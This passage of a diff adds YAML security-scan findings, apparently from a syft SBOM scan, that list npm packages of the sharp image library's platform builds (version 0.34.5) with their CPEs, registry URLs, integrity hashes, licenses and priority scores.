sha512-9dLqsvwtg1uuXBGZKsxem9595+ujv0sJ6Vi8wcTANSFpwV/GONat5eCkzQo/1O6zRIkh0m/8+5BjrRr7jDUSZw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f3729e97d1846b60 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-linux-arm64 0.34.5' + title: '@img/sharp-linux-arm64 0.34.5' + description: 'Package discovered: @img/sharp-linux-arm64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fd64c295f8bc0b6a + name: '@img/sharp-linux-arm64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-linux-arm64:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux-arm64:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_arm64:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_arm64:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-linux-arm64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-linux-arm64/-/sharp-linux-arm64-0.34.5.tgz + integrity: sha512-bKQzaJRY/bkPOXyKx5EVup7qkaojECG6NLYswgktOZjaXecSAeCWiZwwiFf3/Y+O1HrauiE3FVsGxFg8c24rZg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7108a685f3138a28 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-linux-ppc64 0.34.5' + title: '@img/sharp-linux-ppc64 0.34.5' + description: 'Package discovered: @img/sharp-linux-ppc64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3b1510e0e0b839b3 + name: '@img/sharp-linux-ppc64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-linux-ppc64:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux-ppc64:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_ppc64:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_ppc64:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-linux-ppc64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-linux-ppc64/-/sharp-linux-ppc64-0.34.5.tgz + integrity: sha512-7zznwNaqW6YtsfrGGDA6BRkISKAAE1Jo0QdpNYXNMHu2+0dTrPflTLNkpc8l7MUP5M16ZJcUvysVWWrMefZquA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7bce516733b8ed22 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-linux-riscv64 0.34.5' + title: '@img/sharp-linux-riscv64 0.34.5' + description: 'Package discovered: @img/sharp-linux-riscv64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 523b83e120964834 + name: '@img/sharp-linux-riscv64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-linux-riscv64:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux-riscv64:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_riscv64:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_riscv64:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-linux-riscv64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-linux-riscv64/-/sharp-linux-riscv64-0.34.5.tgz + integrity: sha512-51gJuLPTKa7piYPaVs8GmByo7/U7/7TZOq+cnXJIHZKavIRHAP77e3N2HEl3dgiqdD/w0yUfiJnII77PuDDFdw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 95b5e1930a0a90db + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-linux-s390x 0.34.5' + title: '@img/sharp-linux-s390x 0.34.5' + description: 'Package discovered: @img/sharp-linux-s390x 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: cdcec5be4d61926b + name: '@img/sharp-linux-s390x' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-linux-s390x:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux-s390x:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_s390x:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_s390x:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-linux-s390x@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-linux-s390x/-/sharp-linux-s390x-0.34.5.tgz + integrity: sha512-nQtCk0PdKfho3eC5MrbQoigJ2gd1CgddUMkabUj+rBevs8tZ2cULOx46E7oyX+04WGfABgIwmMC0VqieTiR4jg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ba4a76a3169a3261 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-linux-x64 0.34.5' + title: '@img/sharp-linux-x64 0.34.5' + description: 'Package discovered: @img/sharp-linux-x64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8ea3a106d5c8d10b + name: '@img/sharp-linux-x64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-linux-x64:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux-x64:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_x64:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux_x64:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-linux-x64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-linux-x64/-/sharp-linux-x64-0.34.5.tgz + integrity: sha512-MEzd8HPKxVxVenwAa+JRPwEC7QFjoPWuS5NZnBt6B3pu7EG2Ge0id1oLHZpPJdn3OQK+BQDiw9zStiHBTJQQQQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 357195decb462ec7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-linuxmusl-arm64 0.34.5' + title: '@img/sharp-linuxmusl-arm64 0.34.5' + description: 'Package discovered: @img/sharp-linuxmusl-arm64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: c5d74af075cbec8c + name: '@img/sharp-linuxmusl-arm64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-arm64:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-arm64:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_arm64:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_arm64:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-linuxmusl-arm64/-/sharp-linuxmusl-arm64-0.34.5.tgz + integrity: sha512-fprJR6GtRsMt6Kyfq44IsChVZeGN97gTD331weR1ex1c1rypDEABN6Tm2xa1wE6lYb5DdEnk03NZPqA7Id21yg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5332b892777fe61c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-linuxmusl-x64 0.34.5' + title: '@img/sharp-linuxmusl-x64 0.34.5' + description: 'Package discovered: @img/sharp-linuxmusl-x64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 26c07c454ffe91ee + name: '@img/sharp-linuxmusl-x64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-x64:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-x64:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_x64:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_x64:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-linuxmusl-x64/-/sharp-linuxmusl-x64-0.34.5.tgz + integrity: sha512-Jg8wNT1MUzIvhBFxViqrEhWDGzqymo3sV7z7ZsaWbZNDLXRJZoRGrjulp60YYtV4wfY8VIKcWidjojlLcWrd8Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 34c9f7634c9fe393 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-wasm32 0.34.5' + title: '@img/sharp-wasm32 0.34.5' + description: 'Package discovered: @img/sharp-wasm32 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ef4974ec29f2dcac + name: '@img/sharp-wasm32' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 AND LGPL-3.0-or-later AND MIT + spdxExpression: Apache-2.0 AND LGPL-3.0-or-later AND MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-wasm32:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-wasm32:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_wasm32:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_wasm32:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-wasm32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_wasm32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-wasm32@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-wasm32/-/sharp-wasm32-0.34.5.tgz + integrity: sha512-OdWTEiVkY2PHwqkbBI8frFxQQFekHaSSkUIJkwzclWZe64O1X4UlUjqqqLaPbUpMOQk6FBu/HtlGXNblIs0huw== + dependencies: + '@emnapi/runtime': ^1.7.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 866d76b99aec49d7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-win32-arm64 0.34.5' + title: '@img/sharp-win32-arm64 0.34.5' + description: 'Package discovered: @img/sharp-win32-arm64 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b108eb8ed0a59806 + name: '@img/sharp-win32-arm64' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 AND LGPL-3.0-or-later + spdxExpression: Apache-2.0 AND LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-win32-arm64:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32-arm64:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32_arm64:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32_arm64:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_win32_arm64:0.34.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40img/sharp-win32-arm64@0.34.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@img/sharp-win32-arm64/-/sharp-win32-arm64-0.34.5.tgz + integrity: sha512-WQ3AgWCWYSb2yt+IG8mnC6Jdk9Whs7O0gxphblsLvdhSpSTtmu69ZG1Gkb6NuvxsNACwiPV6cNSZNzt0KPsw7g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 574980068e294acc + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @img/sharp-win32-ia32 0.34.5' + title: '@img/sharp-win32-ia32 0.34.5' + description: 'Package discovered: @img/sharp-win32-ia32 0.34.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8da96e6bc654731f + name: '@img/sharp-win32-ia32' + version: 0.34.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 AND LGPL-3.0-or-later + spdxExpression: Apache-2.0 AND LGPL-3.0-or-later + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@img\/sharp-win32-ia32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32-ia32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32_ia32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32_ia32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp-win32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp_win32:\@img\/sharp_win32_ia32:0.34.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-win32-ia32:0.34.5:*:*:*:*:*:*:* + source: 